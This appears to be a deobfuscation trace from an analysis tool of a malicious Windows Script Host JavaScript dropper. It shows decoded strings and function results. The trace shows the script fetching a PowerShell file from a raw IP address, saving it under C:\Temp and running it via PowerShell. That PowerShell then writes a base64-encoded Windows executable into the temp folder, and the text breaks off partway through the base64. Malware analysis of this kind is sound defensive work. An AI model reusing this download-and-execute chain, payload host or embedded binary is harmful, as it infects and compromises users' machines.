                                                                                                                                                                        • a() ➔ v1nJCMLWDc5tAgvSBa,W4lcNCkxW64ngmoZwCkcW6lcVaa,rg93BMXVywqGzMfPBgvKihDPDgGGC3rHDhvZoIa,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,ACkUdHfzeGlcS3ldImorW4fbBa,r8o2W69AWQulW7tdG8k+WQnGW7ipf8ojj8o0W61wv8o0W4hcLgbhESoCW79QW4OTW6nTWOJdMgNcHq,AbRcSmoxW4q1w0RdKSkMW6ZdTG,mfddPh3cRSkaAa,WOfxW7RdOmo3,tvnytuWYlLHnteHuvfa,t3bLBG,u3rHDhvZ,gSoZWONdGdyrWPb1W6pdSuqf,fLbMlsjVWR9Hvt4HwW,u2nYAxb0Aw5NlKzPBgvtExn0zw1pyMPLy3q,W63dIre7W4NdQrJcHtO1W7hcOG,F8o5WRldIW,DsipxItcNq,vmojzSoSWQldR8ojW6a,mJfvvxP0EMG,W592WRRdHmoSgNTYW7ddPmknCSoJW4K,WP8NDudcN8o/WPLMjW,mrhdKGpcMmoSW5T2uCocW5K+W6a,r0vu,p0GGemk7ymkQWQ07FmktWPPU,q3jLyxrLrM9SzgvY,FmoyW4xcSCkmAh3dL8oHWPO6Dmk9xSo7mSoaomk7W5ivW5mGWOFdIKbhE8obWRn0WQuAWRtdGGL9WOBcK2mIWQpcHmoNk8oza8oEySk6jSolW5ldIMSba8ko,gSoZWORdJdutWOrnW5RdR14y,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVqLjbsu5otI5WCZe,W4FcLCktW64nhmkeFCk5W5dcPI3dHa,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,r3qzW6z9W5xdLZDRW50LW5ddIW,q3jLyxrLvgv4DezPBgu,qZVdLCok,BwvZC2fNzq,nJmWodG2oeXzvuPWyG,W6/dIbmYW4/dR3RcPHKFW5hcLMq,nJGZndeYmfrmqK91ra,uNvU,mtbZs3ngBg4,WOOjl8ojWRRcTvTEu8kpxCkMWPq7D0GJcCkpcbtcPSkLWOhdHfW
                                                                                                                                                                        • a() ➔ v1nJCMLWDc5tAgvSBa,W4lcNCkxW64ngmoZwCkcW6lcVaa,rg93BMXVywqGzMfPBgvKihDPDgGGC3rHDhvZoIa,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,ACkUdHfzeGlcS3ldImorW4fbBa,r8o2W69AWQulW7tdG8k+WQnGW7ipf8ojj8o0W61wv8o0W4hcLgbhESoCW79QW4OTW6nTWOJdMgNcHq,AbRcSmoxW4q1w0RdKSkMW6ZdTG,mfddPh3cRSkaAa,WOfxW7RdOmo3,tvnytuWYlLHnteHuvfa,t3bLBG,u3rHDhvZ,gSoZWONdGdyrWPb1W6pdSuqf,fLbMlsjVWR9Hvt4HwW,u2nYAxb0Aw5NlKzPBgvtExn0zw1pyMPLy3q,W63dIre7W4NdQrJcHtO1W7hcOG,F8o5WRldIW,DsipxItcNq,vmojzSoSWQldR8ojW6a,mJfvvxP0EMG,W592WRRdHmoSgNTYW7ddPmknCSoJW4K,WP8NDudcN8o/WPLMjW,mrhdKGpcMmoSW5T2uCocW5K+W6a,r0vu,p0GGemk7ymkQWQ07FmktWPPU,q3jLyxrLrM9SzgvY,FmoyW4xcSCkmAh3dL8oHWPO6Dmk9xSo7mSoaomk7W5ivW5mGWOFdIKbhE8obWRn0WQuAWRtdGGL9WOBcK2mIWQpcHmoNk8oza8oEySk6jSolW5ldIMSba8ko,gSoZWORdJdutWOrnW5RdR14y,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVqLjbsu5otI5WCZe,W4FcLCktW64nhmkeFCk5W5dcPI3dHa,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,r3qzW6z9W5xdLZDRW50LW5ddIW,q3jLyxrLvgv4DezPBgu,qZVdLCok,BwvZC2fNzq,nJmWodG2oeXzvuPWyG,W6/dIbmYW4/dR3RcPHKFW5hcLMq,nJGZndeYmfrmqK91ra,uNvU,mtbZs3ngBg4,WOOjl8ojWRRcTvTEu8kpxCkMWPq7D0GJcCkpcbtcPSkLWOhdHfW
                                                                                                                                                                        • a() ➔ v1nJCMLWDc5tAgvSBa,W4lcNCkxW64ngmoZwCkcW6lcVaa,rg93BMXVywqGzMfPBgvKihDPDgGGC3rHDhvZoIa,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,ACkUdHfzeGlcS3ldImorW4fbBa,r8o2W69AWQulW7tdG8k+WQnGW7ipf8ojj8o0W61wv8o0W4hcLgbhESoCW79QW4OTW6nTWOJdMgNcHq,AbRcSmoxW4q1w0RdKSkMW6ZdTG,mfddPh3cRSkaAa,WOfxW7RdOmo3,tvnytuWYlLHnteHuvfa,t3bLBG,u3rHDhvZ,gSoZWONdGdyrWPb1W6pdSuqf,fLbMlsjVWR9Hvt4HwW,u2nYAxb0Aw5NlKzPBgvtExn0zw1pyMPLy3q,W63dIre7W4NdQrJcHtO1W7hcOG,F8o5WRldIW,DsipxItcNq,vmojzSoSWQldR8ojW6a,mJfvvxP0EMG,W592WRRdHmoSgNTYW7ddPmknCSoJW4K,WP8NDudcN8o/WPLMjW,mrhdKGpcMmoSW5T2uCocW5K+W6a,r0vu,p0GGemk7ymkQWQ07FmktWPPU,q3jLyxrLrM9SzgvY,FmoyW4xcSCkmAh3dL8oHWPO6Dmk9xSo7mSoaomk7W5ivW5mGWOFdIKbhE8obWRn0WQuAWRtdGGL9WOBcK2mIWQpcHmoNk8oza8oEySk6jSolW5ldIMSba8ko,gSoZWORdJdutWOrnW5RdR14y,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVqLjbsu5otI5WCZe,W4FcLCktW64nhmkeFCk5W5dcPI3dHa,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,r3qzW6z9W5xdLZDRW50LW5ddIW,q3jLyxrLvgv4DezPBgu,qZVdLCok,BwvZC2fNzq,nJmWodG2oeXzvuPWyG,W6/dIbmYW4/dR3RcPHKFW5hcLMq,nJGZndeYmfrmqK91ra,uNvU,mtbZs3ngBg4,WOOjl8ojWRRcTvTEu8kpxCkMWPq7D0GJcCkpcbtcPSkLWOhdHfW
                                                                                                                                                                        • a() ➔ v1nJCMLWDc5tAgvSBa,W4lcNCkxW64ngmoZwCkcW6lcVaa,rg93BMXVywqGzMfPBgvKihDPDgGGC3rHDhvZoIa,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,ACkUdHfzeGlcS3ldImorW4fbBa,r8o2W69AWQulW7tdG8k+WQnGW7ipf8ojj8o0W61wv8o0W4hcLgbhESoCW79QW4OTW6nTWOJdMgNcHq,AbRcSmoxW4q1w0RdKSkMW6ZdTG,mfddPh3cRSkaAa,WOfxW7RdOmo3,tvnytuWYlLHnteHuvfa,t3bLBG,u3rHDhvZ,gSoZWONdGdyrWPb1W6pdSuqf,fLbMlsjVWR9Hvt4HwW,u2nYAxb0Aw5NlKzPBgvtExn0zw1pyMPLy3q,W63dIre7W4NdQrJcHtO1W7hcOG,F8o5WRldIW,DsipxItcNq,vmojzSoSWQldR8ojW6a,mJfvvxP0EMG,W592WRRdHmoSgNTYW7ddPmknCSoJW4K,WP8NDudcN8o/WPLMjW,mrhdKGpcMmoSW5T2uCocW5K+W6a,r0vu,p0GGemk7ymkQWQ07FmktWPPU,q3jLyxrLrM9SzgvY,FmoyW4xcSCkmAh3dL8oHWPO6Dmk9xSo7mSoaomk7W5ivW5mGWOFdIKbhE8obWRn0WQuAWRtdGGL9WOBcK2mIWQpcHmoNk8oza8oEySk6jSolW5ldIMSba8ko,gSoZWORdJdutWOrnW5RdR14y,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVqLjbsu5otI5WCZe,W4FcLCktW64nhmkeFCk5W5dcPI3dHa,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,r3qzW6z9W5xdLZDRW50LW5ddIW,q3jLyxrLvgv4DezPBgu,qZVdLCok,BwvZC2fNzq,nJmWodG2oeXzvuPWyG,W6/dIbmYW4/dR3RcPHKFW5hcLMq,nJGZndeYmfrmqK91ra,uNvU,mtbZs3ngBg4,WOOjl8ojWRRcTvTEu8kpxCkMWPq7D0GJcCkpcbtcPSkLWOhdHfW
                                                                                                                                                                        • a() ➔ v1nJCMLWDc5tAgvSBa,W4lcNCkxW64ngmoZwCkcW6lcVaa,rg93BMXVywqGzMfPBgvKihDPDgGGC3rHDhvZoIa,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,ACkUdHfzeGlcS3ldImorW4fbBa,r8o2W69AWQulW7tdG8k+WQnGW7ipf8ojj8o0W61wv8o0W4hcLgbhESoCW79QW4OTW6nTWOJdMgNcHq,AbRcSmoxW4q1w0RdKSkMW6ZdTG,mfddPh3cRSkaAa,WOfxW7RdOmo3,tvnytuWYlLHnteHuvfa,t3bLBG,u3rHDhvZ,gSoZWONdGdyrWPb1W6pdSuqf,fLbMlsjVWR9Hvt4HwW,u2nYAxb0Aw5NlKzPBgvtExn0zw1pyMPLy3q,W63dIre7W4NdQrJcHtO1W7hcOG,F8o5WRldIW,DsipxItcNq,vmojzSoSWQldR8ojW6a,mJfvvxP0EMG,W592WRRdHmoSgNTYW7ddPmknCSoJW4K,WP8NDudcN8o/WPLMjW,mrhdKGpcMmoSW5T2uCocW5K+W6a,r0vu,p0GGemk7ymkQWQ07FmktWPPU,q3jLyxrLrM9SzgvY,FmoyW4xcSCkmAh3dL8oHWPO6Dmk9xSo7mSoaomk7W5ivW5mGWOFdIKbhE8obWRn0WQuAWRtdGGL9WOBcK2mIWQpcHmoNk8oza8oEySk6jSolW5ldIMSba8ko,gSoZWORdJdutWOrnW5RdR14y,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVqLjbsu5otI5WCZe,W4FcLCktW64nhmkeFCk5W5dcPI3dHa,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,r3qzW6z9W5xdLZDRW50LW5ddIW,q3jLyxrLvgv4DezPBgu,qZVdLCok,BwvZC2fNzq,nJmWodG2oeXzvuPWyG,W6/dIbmYW4/dR3RcPHKFW5hcLMq,nJGZndeYmfrmqK91ra,uNvU,mtbZs3ngBg4,WOOjl8ojWRRcTvTEu8kpxCkMWPq7D0GJcCkpcbtcPSkLWOhdHfW
                                                                                                                                                                        • a() ➔ v1nJCMLWDc5tAgvSBa,W4lcNCkxW64ngmoZwCkcW6lcVaa,rg93BMXVywqGzMfPBgvKihDPDgGGC3rHDhvZoIa,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,ACkUdHfzeGlcS3ldImorW4fbBa,r8o2W69AWQulW7tdG8k+WQnGW7ipf8ojj8o0W61wv8o0W4hcLgbhESoCW79QW4OTW6nTWOJdMgNcHq,AbRcSmoxW4q1w0RdKSkMW6ZdTG,mfddPh3cRSkaAa,WOfxW7RdOmo3,tvnytuWYlLHnteHuvfa,t3bLBG,u3rHDhvZ,gSoZWONdGdyrWPb1W6pdSuqf,fLbMlsjVWR9Hvt4HwW,u2nYAxb0Aw5NlKzPBgvtExn0zw1pyMPLy3q,W63dIre7W4NdQrJcHtO1W7hcOG,F8o5WRldIW,DsipxItcNq,vmojzSoSWQldR8ojW6a,mJfvvxP0EMG,W592WRRdHmoSgNTYW7ddPmknCSoJW4K,WP8NDudcN8o/WPLMjW,mrhdKGpcMmoSW5T2uCocW5K+W6a,r0vu,p0GGemk7ymkQWQ07FmktWPPU,q3jLyxrLrM9SzgvY,FmoyW4xcSCkmAh3dL8oHWPO6Dmk9xSo7mSoaomk7W5ivW5mGWOFdIKbhE8obWRn0WQuAWRtdGGL9WOBcK2mIWQpcHmoNk8oza8oEySk6jSolW5ldIMSba8ko,gSoZWORdJdutWOrnW5RdR14y,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVqLjbsu5otI5WCZe,W4FcLCktW64nhmkeFCk5W5dcPI3dHa,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,r3qzW6z9W5xdLZDRW50LW5ddIW,q3jLyxrLvgv4DezPBgu,qZVdLCok,BwvZC2fNzq,nJmWodG2oeXzvuPWyG,W6/dIbmYW4/dR3RcPHKFW5hcLMq,nJGZndeYmfrmqK91ra,uNvU,mtbZs3ngBg4,WOOjl8ojWRRcTvTEu8kpxCkMWPq7D0GJcCkpcbtcPSkLWOhdHfW
                                                                                                                                                                        • a() ➔ v1nJCMLWDc5tAgvSBa,W4lcNCkxW64ngmoZwCkcW6lcVaa,rg93BMXVywqGzMfPBgvKihDPDgGGC3rHDhvZoIa,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,ACkUdHfzeGlcS3ldImorW4fbBa,r8o2W69AWQulW7tdG8k+WQnGW7ipf8ojj8o0W61wv8o0W4hcLgbhESoCW79QW4OTW6nTWOJdMgNcHq,AbRcSmoxW4q1w0RdKSkMW6ZdTG,mfddPh3cRSkaAa,WOfxW7RdOmo3,tvnytuWYlLHnteHuvfa,t3bLBG,u3rHDhvZ,gSoZWONdGdyrWPb1W6pdSuqf,fLbMlsjVWR9Hvt4HwW,u2nYAxb0Aw5NlKzPBgvtExn0zw1pyMPLy3q,W63dIre7W4NdQrJcHtO1W7hcOG,F8o5WRldIW,DsipxItcNq,vmojzSoSWQldR8ojW6a,mJfvvxP0EMG,W592WRRdHmoSgNTYW7ddPmknCSoJW4K,WP8NDudcN8o/WPLMjW,mrhdKGpcMmoSW5T2uCocW5K+W6a,r0vu,p0GGemk7ymkQWQ07FmktWPPU,q3jLyxrLrM9SzgvY,FmoyW4xcSCkmAh3dL8oHWPO6Dmk9xSo7mSoaomk7W5ivW5mGWOFdIKbhE8obWRn0WQuAWRtdGGL9WOBcK2mIWQpcHmoNk8oza8oEySk6jSolW5ldIMSba8ko,gSoZWORdJdutWOrnW5RdR14y,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVqLjbsu5otI5WCZe,W4FcLCktW64nhmkeFCk5W5dcPI3dHa,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,r3qzW6z9W5xdLZDRW50LW5ddIW,q3jLyxrLvgv4DezPBgu,qZVdLCok,BwvZC2fNzq,nJmWodG2oeXzvuPWyG,W6/dIbmYW4/dR3RcPHKFW5hcLMq,nJGZndeYmfrmqK91ra,uNvU,mtbZs3ngBg4,WOOjl8ojWRRcTvTEu8kpxCkMWPq7D0GJcCkpcbtcPSkLWOhdHfW
                                                                                                                                                                        • Show all Function Runs
                                                                                                                                                                        75
                                                                                                                                                                        return b =
                                                                                                                                                                          76
                                                                                                                                                                          function (f, g) {
                                                                                                                                                                          • b(307,undefined) ➔ "6834120TLBOuD"
                                                                                                                                                                          • b(309,undefined) ➔ "10sKsFln"
                                                                                                                                                                          • b(298,undefined) ➔ "http://176.65.144.3/dev/BRAINNN.ps1"
                                                                                                                                                                          • b(300,undefined) ➔ "C:\Temp\WTRTRWFSHS.ps1"
                                                                                                                                                                          • b(270,undefined) ➔ "WScript.Shell"
                                                                                                                                                                          • b(284,undefined) ➔ "Scripting.FileSystemObject"
                                                                                                                                                                          • b(279,undefined) ➔ "MSXML2.XMLHTTP"
                                                                                                                                                                          • b(295,undefined) ➔ "CreateFolder"
                                                                                                                                                                          • b(280,undefined) ➔ "Open"
                                                                                                                                                                          • b(293,undefined) ➔ "GET"
                                                                                                                                                                          • Show all Function Runs
                                                                                                                                                                          77
                                                                                                                                                                          f = f - 0x10e;
                                                                                                                                                                            78
                                                                                                                                                                            var h = e[f];
                                                                                                                                                                              79
                                                                                                                                                                              if ( b['NrgeNG'] === undefined )
                                                                                                                                                                                80
                                                                                                                                                                                {
                                                                                                                                                                                  81
                                                                                                                                                                                  var i = function (m) {
                                                                                                                                                                                  • function (f, g).VpnTcu("nJGZndeYmfrmqK91ra") ➔ "6834120TLBOuD"
                                                                                                                                                                                  • function (f, g).VpnTcu("mtbZs3ngBg4") ➔ "10sKsFln"
                                                                                                                                                                                  • function (f, g).VpnTcu("Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVqLjbsu5otI5WCZe") ➔ "http://176.65.144.3/dev/BRAINNN.ps1"
                                                                                                                                                                                  • function (f, g).VpnTcu("qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq") ➔ "C:\Temp\WTRTRWFSHS.ps1"
                                                                                                                                                                                  • function (f, g).VpnTcu("v1nJCMLWDc5tAgvSBa") ➔ "WScript.Shell"
                                                                                                                                                                                  • function (f, g).VpnTcu("u2nYAxb0Aw5NlKzPBgvtExn0zw1pyMPLy3q") ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                  • function (f, g).VpnTcu("tvnytuWYlLHnteHuvfa") ➔ "MSXML2.XMLHTTP"
                                                                                                                                                                                  • function (f, g).VpnTcu("q3jLyxrLrM9SzgvY") ➔ "CreateFolder"
                                                                                                                                                                                  • function (f, g).VpnTcu("t3bLBG") ➔ "Open"
                                                                                                                                                                                  • function (f, g).VpnTcu("r0vu") ➔ "GET"
                                                                                                                                                                                  • Show all Function Runs
                                                                                                                                                                                  82
                                                                                                                                                                                  var n = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
                                                                                                                                                                                    83
                                                                                                                                                                                    var o = '', p = '';
                                                                                                                                                                                      84
                                                                                                                                                                                      for ( var q = 0x0, r, s, t = 0x0 ; s = m['charAt'] ( t ++ ) ; ~ s && ( r = q % 0x4 ? r * 0x40 + s : s, q ++ % 0x4 ) ? o += String['fromCharCode'] ( 0xff & r >> ( - 0x2 * q & 0x6 ) ) : 0x0 )
                                                                                                                                                                                        85
                                                                                                                                                                                        {
                                                                                                                                                                                          86
                                                                                                                                                                                          s = n['indexOf'] ( s );
                                                                                                                                                                                            87
                                                                                                                                                                                            }
                                                                                                                                                                                              88
                                                                                                                                                                                              for ( var u = 0x0, v = o['length'] ; u < v ; u ++ )
                                                                                                                                                                                                89
                                                                                                                                                                                                {
                                                                                                                                                                                                  90
                                                                                                                                                                                                  p += '%' + ( '00' + o['charCodeAt'] ( u ) ['toString'] ( 0x10 ) )['slice'] ( - 0x2 );
                                                                                                                                                                                                    91
                                                                                                                                                                                                    }
                                                                                                                                                                                                      92
                                                                                                                                                                                                      return decodeURIComponent ( p );
                                                                                                                                                                                                      • decodeURIComponent("%36%38%33%34%31%32%30%54%4c%42%4f%75%44") ➔ "6834120TLBOuD"
                                                                                                                                                                                                      • decodeURIComponent("%31%30%73%4b%73%46%6c%6e") ➔ "10sKsFln"
                                                                                                                                                                                                      • decodeURIComponent("%68%74%74%70%3a%2f%2f%31%37%36%2e%36%35%2e%31%34%34%2e%33%2f%64%65%76%2f%42%52%41%49%4e%4e%4e%2e%70%73%31") ➔ "http://176.65.144.3/dev/BRAINNN.ps1"
                                                                                                                                                                                                      • decodeURIComponent("%43%3a%5c%54%65%6d%70%5c%57%54%52%54%52%57%46%53%48%53%2e%70%73%31") ➔ "C:\Temp\WTRTRWFSHS.ps1"
                                                                                                                                                                                                      • decodeURIComponent("%57%53%63%72%69%70%74%2e%53%68%65%6c%6c") ➔ "WScript.Shell"
                                                                                                                                                                                                      • decodeURIComponent("%53%63%72%69%70%74%69%6e%67%2e%46%69%6c%65%53%79%73%74%65%6d%4f%62%6a%65%63%74") ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                                      • decodeURIComponent("%4d%53%58%4d%4c%32%2e%58%4d%4c%48%54%54%50") ➔ "MSXML2.XMLHTTP"
                                                                                                                                                                                                      • decodeURIComponent("%43%72%65%61%74%65%46%6f%6c%64%65%72") ➔ "CreateFolder"
                                                                                                                                                                                                      • decodeURIComponent("%4f%70%65%6e") ➔ "Open"
                                                                                                                                                                                                      • decodeURIComponent("%47%45%54") ➔ "GET"
                                                                                                                                                                                                      • Show all Function Runs
                                                                                                                                                                                                      93
                                                                                                                                                                                                      };
                                                                                                                                                                                                        94
                                                                                                                                                                                                        b['VpnTcu'] = i, c = arguments, b['NrgeNG'] = ! ! [];
                                                                                                                                                                                                          95
                                                                                                                                                                                                          }
                                                                                                                                                                                                            96
                                                                                                                                                                                                            var j = e[0x0], k = f + j, l = c[k];
                                                                                                                                                                                                              97
                                                                                                                                                                                                              return ! l ? ( h = b['VpnTcu'] ( h ), c[k] = h ) : h = l, h;
                                                                                                                                                                                                              • function (f, g).VpnTcu("nJGZndeYmfrmqK91ra") ➔ "6834120TLBOuD"
                                                                                                                                                                                                              • function (f, g).VpnTcu("mtbZs3ngBg4") ➔ "10sKsFln"
                                                                                                                                                                                                              • function (f, g).VpnTcu("Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVqLjbsu5otI5WCZe") ➔ "http://176.65.144.3/dev/BRAINNN.ps1"
                                                                                                                                                                                                              • function (f, g).VpnTcu("qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq") ➔ "C:\Temp\WTRTRWFSHS.ps1"
                                                                                                                                                                                                              • function (f, g).VpnTcu("v1nJCMLWDc5tAgvSBa") ➔ "WScript.Shell"
                                                                                                                                                                                                              • function (f, g).VpnTcu("u2nYAxb0Aw5NlKzPBgvtExn0zw1pyMPLy3q") ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                                              • function (f, g).VpnTcu("tvnytuWYlLHnteHuvfa") ➔ "MSXML2.XMLHTTP"
                                                                                                                                                                                                              • function (f, g).VpnTcu("q3jLyxrLrM9SzgvY") ➔ "CreateFolder"
                                                                                                                                                                                                              • function (f, g).VpnTcu("t3bLBG") ➔ "Open"
                                                                                                                                                                                                              • function (f, g).VpnTcu("r0vu") ➔ "GET"
                                                                                                                                                                                                              • Show all Function Runs
                                                                                                                                                                                                              98
                                                                                                                                                                                                              }, b ( c, d );
                                                                                                                                                                                                                99
                                                                                                                                                                                                                }
                                                                                                                                                                                                                  100
                                                                                                                                                                                                                  var URL = k ( 0x12a ), DownloadPath = k ( 0x12c ), TEMP_DIR = l ( 0x115, '[My@' ), SUCCESS_STATUS = 0xc8, POWERSHELL_CMD = l ( 0x128, '871P' ), shell = WScript['CreateObject'] ( k ( 0x10e ) ), fileSystem = WScript['CreateObject'] ( k ( 0x11c ) ), http = WScript[l ( 0x11b, ']qiI' ) ] ( k ( 0x117 ) );
                                                                                                                                                                                                                  • b(298) ➔ "http://176.65.144.3/dev/BRAINNN.ps1"
                                                                                                                                                                                                                  • b(300) ➔ "C:\Temp\WTRTRWFSHS.ps1"
                                                                                                                                                                                                                  • c(277,"[My@") ➔ "C:\Temp"
                                                                                                                                                                                                                  • c(296,"871P") ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
                                                                                                                                                                                                                  • b(270) ➔ "WScript.Shell"
                                                                                                                                                                                                                  • Windows Script Host.CreateObject("WScript.Shell") ➔
                                                                                                                                                                                                                  • b(284) ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                                                  • Windows Script Host.CreateObject("Scripting.FileSystemObject") ➔
                                                                                                                                                                                                                  • l(283,"]qiI") ➔ "CreateObject"
                                                                                                                                                                                                                  • b(279) ➔ "MSXML2.XMLHTTP"
                                                                                                                                                                                                                  • Windows Script Host.CreateObject("MSXML2.XMLHTTP") ➔
                                                                                                                                                                                                                  • Show all Function Runs
                                                                                                                                                                                                                  101
                                                                                                                                                                                                                  ! fileSystem['FolderExists'] ( TEMP_DIR ) && fileSystem[k ( 0x127 ) ] ( TEMP_DIR );
                                                                                                                                                                                                                  • FolderExists("C:\Temp") ➔ false
                                                                                                                                                                                                                  • b(295) ➔ "CreateFolder"
                                                                                                                                                                                                                  • CreateFolder("C:\Temp") ➔ C:\Temp
                                                                                                                                                                                                                  • Show all Function Runs
                                                                                                                                                                                                                  102
                                                                                                                                                                                                                  function DownloadScript(d, f) {
                                                                                                                                                                                                                  • DownloadScript("http://176.65.144.3/dev/BRAINNN.ps1","C:\Temp\WTRTRWFSHS.ps1") ➔ true
                                                                                                                                                                                                                  103
                                                                                                                                                                                                                  var n = l, m = k;
                                                                                                                                                                                                                    104
                                                                                                                                                                                                                    try
                                                                                                                                                                                                                      105
                                                                                                                                                                                                                      {
                                                                                                                                                                                                                        106
                                                                                                                                                                                                                        http[m ( 0x118 ) ] ( m ( 0x125 ), d, ! [] ), http['Send'] ( );
                                                                                                                                                                                                                        • b(280) ➔ "Open"
                                                                                                                                                                                                                        • b(293) ➔ "GET"
                                                                                                                                                                                                                        • Open("GET","http://176.65.144.3/dev/BRAINNN.ps1",false) ➔ undefined
                                                                                                                                                                                                                        • Send() ➔ undefined
                                                                                                                                                                                                                        • Show all Function Runs
                                                                                                                                                                                                                        107
                                                                                                                                                                                                                        if ( http[m ( 0x119 ) ] === SUCCESS_STATUS )
                                                                                                                                                                                                                        • m(281) ➔ "Status"
                                                                                                                                                                                                                        108
                                                                                                                                                                                                                        {
                                                                                                                                                                                                                          109
                                                                                                                                                                                                                          var g = fileSystem[m ( 0x12e ) ] ( f, ! ! [] );
                                                                                                                                                                                                                          • m(302) ➔ "CreateTextFile"
                                                                                                                                                                                                                          • CreateTextFile("C:\Temp\WTRTRWFSHS.ps1",true) ➔
                                                                                                                                                                                                                          • Show all Function Runs
                                                                                                                                                                                                                          110
                                                                                                                                                                                                                          return g['Write'] ( http[n ( 0x114, 'c%VU' ) ] ), g[n ( 0x116, '11*M' ) ] ( ), ! ! [];
                                                                                                                                                                                                                          • n(276,"c%VU") ➔ "ResponseText"
                                                                                                                                                                                                                          • Write("$QAADCCDGDHFTRR=[IO.Path]::Combine($env:TEMP,"JXCJKXCJHKJHXCJHKXCXCJHK.exe") [IO.File]::WriteAllBytes($QAADCCDGDHFTRR,[Convert]::FromBase64String("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